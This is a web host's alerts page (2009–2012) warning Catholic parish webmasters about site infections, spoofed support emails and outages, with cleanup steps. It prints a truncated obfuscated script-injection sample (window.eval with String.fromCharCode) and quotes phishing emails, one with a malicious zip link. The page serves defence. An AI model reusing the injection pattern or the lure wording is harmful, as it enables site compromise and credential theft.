As a reminder:

There are thousands of emails being sent out with SPOOFED email addresses. Many of these emails include attachments to or links with Malware or Viruses. NEVER OPEN ANYTHING FROM US, unless….

The Saint Ambrose Foundation or Catholic-Church.org does not send out any emails except in direct response to a customers site inquiry. NEVER open any emails from our support group unless you have opened a ticket with us asking for specific help or services. We NEVER send out expired mail, expired web credentials, or any other email requesting your credentials.

Free Catholic Web Sites!

Posted: July 20, 2012 in Uncategorized

A Web Service for Catholics Free Web Site and Domain Hosting for Official Catholic Organizations

Catholic Web Sites

Saint Ambrose Foundation offers free web sites to official Catholic parish’s and organizations anywhere in the world. We do not profit from this or advertise on your sites.

The Saint Ambrose Foundation is funded from sponsors and your donations. We are devoted to providing quality, ad free web sites to Catholic Parish’s and Organizations for promoting Catholic research, information, & networking on the internet.

Click Here to go to our Web Site

Image

Attention – Important Information

Date:  July 9, 2012 – – Script Virus / ISSUES:

VIRUS ALERT!!!!

We have identified a security vulnerability that we believe was the cause of the repeated attacks on our sites.  This vulnerability has been closed with the installation of the latest security patch.

As a result of these attacks, many of our hosted sites have been identified on GOOGLE as VIRUS INFECTED sites.  If you are receiving this redirection from GOOGLE, please do the following steps.

1. Carefully inspect (or replace) your index.htm or index.html files for script insertion. If you have both of these files, delete them both and install one, good file.

Note:  The virus script is usually located at the bottom of the page and looks similar to this:

=======================================

</body> </html> <script>/*km0ae9gr6m*/window.eval(String.fromCharCode (116,114,121,123,112,114,111,116,111,116,121,112,101,37,50, 59,125,99,97,116,99,104,40,97,115,100,41,123,120,61,50,59,125, 116,114,121,123,113,61,100,111,99,117,109,101,110,116,91,40, 120,41,63,34,99,34,43,34,114,34,58,50,43,34,101,34,43,34,97, 34,43,34,116,34,43,34,101,34,43,34,69,34,43,34,108,34,43,34…..

========================================

2. Carefully inspect other files within your directory for this same script insertion code. (This may be how they are reinstalling the code.)

3. Look for files within your directory that have no relevance or should not be there.  If you don’t know what they are for, (ie: templates, forms, counters, stats, etc) DELETE these files.

4. Request that your FTP or PLESK passwords be changed immediately.  Do not share the new password – protect it from compromise.

5. Webmasters are asked to review the documentation found at

http://www.stopbadware.org/home/security

6. Allow 7 to 10 days to pass, since you have cleaned your directories and feel that the infection has been resolved. before submitting to GOOGLE as a safe site, again.

7. Here are the steps to follow to white-list your website:

=============== 1. Goto www.google.com/webmasters/tools/ 2. Login using your gmail account logins. 3. Add A Site 4. Add the URL – add your domain name. 5. Click Alternative Method 6. Click Upload an html file 7. Download the HTML verification file 8. Upload the file to the document root 9. Confirm successful upload by visiting http://domain.com/filename.html in your browser 10. Click Verify 11. If the verification is successful you will receive a verification successful message =============== Please notify us if you find further infections or issues.    R

Date:  July 1, 2012 – – Script Virus / ISSUES:

VIRUS ALERT!!!!

It has been brought to our attention that some of our hosted websites have been hit with malware scripting.

“I have checked several domains and our scans reported several pages to be infected with known javascript malware. The string “window.eval” is contained in the following files. =========== index.html =========== Please remove the injected code from the files.

Recommended that you reset the passwords of all accounts and scan your local machine using any updated antivirus software. If you are using any third party applications in your website, please make sure that they are secure and update them to the latest version. Once this is done, please send a request to Google to review the website. https://support.google.com/webmasters/bin/answer.py?hl=en&answer=35179 http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633

Additional information found at http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html


Date:  August 15, 2011 – – EMAIL Virus / ISSUES:

VIRUS ALERT!!!!

It has been brought to our attention that our email system has been SPOOFED and is sending out a VIRUS/MALWARE as a .zip attachment. Remember, WE DO NOT EVER solicit or send emails to you EXCEPT in direct response to support or services requested. This page is our ONLY means of notifying you of system outages due to maintenance or system failures.

The email being sent is identified as sent from HAIRSTONDominickExlFOrQ5mH@catholic-church.org

and states:

From: HAIRSTONDominickExlFOrQ5mH [mailto:HAIRSTONDominickExlFOrQ5mH@catholic-church.org] Sent: Monday, August 15, 2011 9:30 PM To: wvccs@catholic-church.org Subject: Re: FW: End of July Stat. required

Hi, As requested I give you the open Invoices issued to you as per 30th July 2011: Regards Dominick HAIRSTON

—————————-

DO NOT OPEN THE ATTACHED FILE IN THIS EMAIL

VIRUS ALERT!!!!

Date:  November 10, 2010 – – SERVER Migration / ISSUES:

Bizwala (Our hosting service provider) has merged with Metro Hosting and as a result, have moved our services to the MH data Center.  This means that the IP addresses for all of our sites have changed.  If you are using an IP address to connect to FTP instead of the domain name, you will need to change it.  All ID’s and passwords remain intact as well as PORT assignments.   Please let us know if you experience any issues.

Date:  AUGUST 1, 2010 – – SERVER CRASHED / ISSUES: On or about July 22, 2010, our servers crashed with a File System corruption that was unrecoverable.  Bizwala moved our hosting services to another server and had to RESTORE all sites back to the latest BACKUP tapes they had.  A secondary issue existed whereby all of our hosted sites would not allow any FTP or SFTP access to any of our sites.

Tonight, I was advised that all sites are now back up with FTP for subdomains of www.catholic-church.org and SFTP for FULL domains. YOU MUST use a specific port for each type of connection which can not be published on this ALERTS page.  The PORT number for SFTP remains the same as it was, however FTP now requires a new port assignment.  You must send me a request for the new FTP port number at support@catholic-church.org .

We apologize for this increased security inconvenience, however hopefully this will help prevent further breaches of our systems and attacks on our hosted sites.

I also wanted to apologize for not updating this ALERTS page sooner, however I, along with all of you, didn’t have any way to access www.catholic-church.org.

ROY……..

Date:  May 11, 2010 – – SPOOF, VIRUS, & PHISHING EMAIL ISSUES:

Continuing issue, our email at support@catholic-church.org has been spoofed in an attempt to get you to open the attached link which will download a virus or phishing software, in order to get your credentials – disguised as a .ZIP file.  Here is a sample of the emails sent:

—–Original Message—– From: catholic-church.org support [mailto:stpaulpastor@catholic-church.org] Sent: Tuesday, May 04, 2010 12:30 PM To: stpaulpastor@catholic-church.org Subject: setting for your mailbox stpaulpastor@catholic-church.org are changed

SMTP and POP3 servers for stpaulpastor@catholic-church.org mailbox are changed. Please carefully read the attached instructions before updating settings.

http://groups.google.com/group/mailsv1/web/setup.zip  <<<do not click on this

DELETE THIS MESSAGE IMMEDIATELY!!  We NEVER send out these kinds of broadcast emails.  THIS ALERTS PAGE is our ONLY method for sending out alerts and notifications.  Please refer back to this page or directly with us. We will respond to specific inquiries, however never as a broadcast. 

Date:  Feb 22, 2010 – – SPOOF, VIRUS, and PHISHING EMAIL ISSUES:

Once again, our email has been spoofed in an attempt to get you to download a virus or phishing to get your credentials – disguised as a .ZIP file.  Here is the email sent:

==========start of message=================

“A new settings file for the support@catholic-church.org has just    be released “

—–Original Message—– From: catholic-church.org Team [mailto:support@catholic-church.org] Sent: Monday, February 22, 2010 12:50 PM To: support@catholic-church.org Subject: A new settings file for the support@catholic-church.org has just be released

Dear use of the catholic-church.org mailing service!

We are informing you that because of the security upgrade of the mailing service your mailbox support@catholic-church.org settings were changed. In order to apply the new set of settings open zip attached file.

Best regards, catholic-church.org Technical Support. ==========end of message=================

If you receive this email or one like it, DELETE THIS EMAIL IMMEDIATELY. WE DO NOT SEND OUT EMAILS LIKE THIS ! ! Date:  Nov 13, 2009 – – System UPGRADES Over the next few weeks, our systems will be upgraded to NEW servers and software.  As a result of these upgrades, site access MAY be affected for up to 24 hours. Another result from the new systems upgrades is that Microsoft’s FRONT PAGE will no longer work on our systems.  This means that if you have created pages using Front Page extension capability, you may find that your templates, buttons, dhtml, or other products that are exclusive to and rely on the Front Page extensions, may no longer work.

As you most of you are aware, with regard to access to your sites, FTP is no longer be allowed in favor of SFTP using a specified PORT. For those that are not using a FTP client that support SFTP, I recommend that you download and use the FILEZILLA (The Free FTP Solution), as it does support SFTP and is very easy to use.

Because Microsoft Front Page is no longer supported by both Microsoft and Plesk, we are recommending a WYSIWYG Web Page software tool that is FREE and very easy to use.  Please consider downloading Trellian Webpage.

If you are looking for an easy to use, FREE graphics editor, I have had some success with Paint.Net.

Date:  Nov 4, 2009 – – System Outage Our servers ran out of DISK SPACE.  This caused many of our sites to experience a problem with uploading files. The symptom showed as you were able to connect to your site with SFTP, however uploading a file never actually started or completed. The destination file (on the server) showed as a filesize of 0.

If you were updating your “index.html” page, and it went to filesize 0,  your site was virtually inaccessible because the page showing would be BLANK.

Please make sure that you are not uploading files or pictures that are large than 100k.

Thank you…… R Dates:  Nov 3, 2009 – Nov 13, 2009 – System Outages Greetings from the Bizwala OPS center,

As part of our commitment to providing high-quality hosting services, maintenance has been planned to upgrade and optimize our network and servers. Both hardware and software updates will be performed.

Please read the maintenance schedule details below carefully.

Dates:  Nov 3, 2009 – Nov 13, 2009

Components affected

- Individual Servers

- Select VPS and Nodes

- Select Switches

Estimated downtime duration:

10 to 40 minutes of intermittent connectivity.

Our apologies for any inconvenience this may cause, and ask you to check our status update page at

http://www.bizwala.com/press/

before submitting a ‘service down’ support request during the above dates. If you have any questions or concerns, please do not hesitate to contact us.

Bizwala OPS Staff


10/14/2009 – SPOOF and PHISHING EMAIL ISSUES:

Phishing/Spoofing Alert:

Please be aware of a new phishing/spoofing attack proliferating the internet. We have noticed a noticeable increase in emails sent out as support@catholic-church.org  These emails are SPOOFED emails that attempt to make you think this is sent by us and turn out to be inappropriate Pharmaceutical sites, Dating services, or attempts to get you to open an attachment which contains a virus or malware code – intended to do damage to your computer or collect personal/banking information from you. [see example below] If you are getting these types of security alerts please notify us right away and please warn your parish or organization not to OPEN any emails from us unless they have specifically requested support or click on any links and/or attachments within these emails.

Bizwala, our hosting service provider updates software directly and will never require a client to click on a link to interact with an update.  We also do not send random emails requesting information updates.

THE FOLLOWING ARE SAMPLES OF WHAT WE HAVE RECEIVED:

******* SAMPLE SPAM 1*****************

Attention!

On October 16, 2009 server upgrade will take place. Due to this the system may be offline for approximately half an hour.The changes will concern security, reliability and performance of mail service and the system as a whole.

For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure.This procedure is quite simple. All you have to do is just to click the link provided, to save the patch file and then to run it from your computer location. That’s all.

http://updates.your-domain.com

Thank you in advance for your attention to this matter and sorry for possible inconveniences.

System Administrator

******* // END SAMPLE SPAM 1*****************

******* SAMPLE SPAM 2*****************

—–Original Message—– From: Marcia Leblanc [mailto:support@catholic-church.org] Sent: Wednesday, October 14, 2009 3:01 PM To: support@catholic-church.org Subject: A new settings file for the support@catholic-church.org has just been released

Dear user of the catholic-church.org mailing service!

We are informing you that because of the security upgrade of the mailing service your mailbox support@catholic-church.org settings were changed. In order to apply the new set of settings open zip attached file.

Best regards, catholic-church.org Technical Support.

Bizwala Staff

There is an attachment named “install.zip” that is designed to damage your computer or install keylogger code to access personal or banking information. NEVER open any attachments or click on any links.

******* // END SAMPLE SPAM 1*****************


9/18/2009 – SYSTEM ISSUES :

Catholic-Church.org sites have been hit with MALWARE redirection issues and several of our sites are showing up in GOOGLE WARNING lists. These are specifically related to sites that allow ADWARE pop-ups.  If you have one of these sites please disable these pop-ups immediately.  Here are some screen shots and information regarding the latest Malware issue:  CLICK HERE

CLICK HERE for a list of known Malware Sites.

EFFECTIVE IMMEDIATELY:  ALL FTP ACCESS TO OUR WEBSITES HAS BEEN DISABLED IN FAVOR OF SFTP. YOUR ID AND PASSWORDS REMAIN INTACT, HOWEVER YOU WILL NEED TO CONTACT US FOR THE PORT NUMBER TO CONFIGURE

SFTP software can be downloaded FREE of charge from:

http://filezilla-project.org/download.php?type=client

These additional measures have been implemented to block a recent outbreak of MALWARE redirection or VIRUS attacks from recurring, however we highly recommend that you immediately change and protect your CP, FTP, or FrontPage passwords.

If you don’t have the ability to Change your password, please contact us and we will reset and send your new password via email.  This email containing your new password will NOT contain the SITE name, URL, or ID credentials.  Only the new password.

Additional information regarding recent attacks and methods recommended for inspecting and protecting your sites can be found at:

http://news.cnet.com/8301-1009_3-10251779-83.html

http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

Additional information about SFTP can be found at:

http://www.radinks.com/sftp/FAQ.php

SITE BACKUPS: During our last attack, we were successful at recovering the index files for all sites that were identified to us, it took some time to pull these from our backup tapes and RESTORE them to the appropriate domains.  Sites where the webmaster holds a current copy of their website, merely had to reinstall the index files from their local copy and were back online in minutes.  A practice I highly recommend that all of our webmasters establish. WEBMASTER NEED TO RETAIN A BACKUP OR COPY OF THEIR ENTIRE WEBSITE ON EXTERNAL SYSTEMS.

If you are still experiencing any issues, send us an email identifying your site and the problems you are continuing to experience

Please use the Support  button to open a support request.

Thank you for your understanding and patience.

Saint Ambrose Foundation

CLICK HERE TO GO TO OUR HOME PAGE

Aside  —  Posted: July 20, 2012 in Uncategorized